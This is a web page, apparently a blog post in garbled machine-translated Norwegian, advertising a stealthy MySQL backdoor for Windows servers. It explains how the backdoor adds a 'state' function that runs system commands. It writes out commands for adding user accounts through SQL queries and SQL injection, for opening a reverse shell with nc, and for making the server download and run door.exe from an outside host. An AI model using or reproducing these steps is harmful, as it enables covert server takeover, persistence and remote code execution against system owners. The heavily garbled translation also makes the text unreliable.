Mysql Backdoor
Kilde: Puri Manchester
MySQL Backdoor var en bakdør for utviklingen av PHP + MySQL server for Mysql etter bakdøren å installere legge til "state"-funksjonen kan utføre system kommandoer, og starte med Mysql prosessen basert dll sniffer typen bakdøren, smart realisert ingen port, ingen prosess, ingen tjenester gjennom veggen Trojan. program i WINXP WIN2003 + MYSQL5.0.X, og under pass.
Installasjonen vil Mysql.php spre seg til PHP server, ifølge fylle ut Host-User-password-db, klikk på "auto-installer Mysql Backdoor"
Etter vellykket installasjon, ville Mysql økes med en "tilstand"-funksjonen, mens Mysql prosessen kjører en sniffing bak døren til dette bakdør i Windows har samme system privilegier og MySQL.
Bruk av statlige funksjoner
Staten funksjon er faktisk en PHP-system () "funksjonen den samme funksjonen kan brukes til å utføre systemkommandoer Vennligst oppgi SQL-kommandoen:." Office og fyll ut mysql setningen skal utføres, for eksempel "velg staten (" nett bruker nohack / add "), klikk på" Execute SQL-setninger vil kjøre resultater.
Med staten funksjon basert Sniff bakdøren, selv om webshell lost, så lenge serveren, SQL-injeksjon punkt, kan vi gjennom injeksjon. Php? Id = 1 og tilstand ("net user ')"-metoden utfører på serveren .? Kommandoen Men hvis injeksjonen punktet er ikke det vi fortsatt kaller Sniff bakdøren kontroll server sendt til en havn på serveren og åpne for Mysql-"begynnelsen av pakken, vil kunne ringe Sniff bakdøren, for eksempel.:
En løpende system kommando: av NC IP 80 -> Enter -> Mysql-cmd / c nett bruker abc / add> c :/ Log.txt, (Merk: "!" Det siste ikke kan utelates)
2 20082 port av skallet til den lokale serveren bounce: første kjøring av NC-LP 20 082 til å overvåke maskinens 20082 port, og deretter av nc den ip 80 -> Enter -> Mysql-c -> Enter
La serveren nedlasting: av nc ip 80 -> Enter -> Mysql-http :/ / www.x.com den / door.exe-c mydoor.exe (NB: siste "ikke kan utelates)
I tillegg til å sende "mysql-c-", er den andre kommandoen ikke ekko, men de tilsvarende kommandoene på serveren som kjører.
Avinstaller Mysql på rømmen "drop funksjonen stat" kan losses, men samtidig vil føre til mysql prosess å gå tilbake til normalt etter omstart.










































155 Trackback (s)
Du må være innlogget for å skrive en kommentar.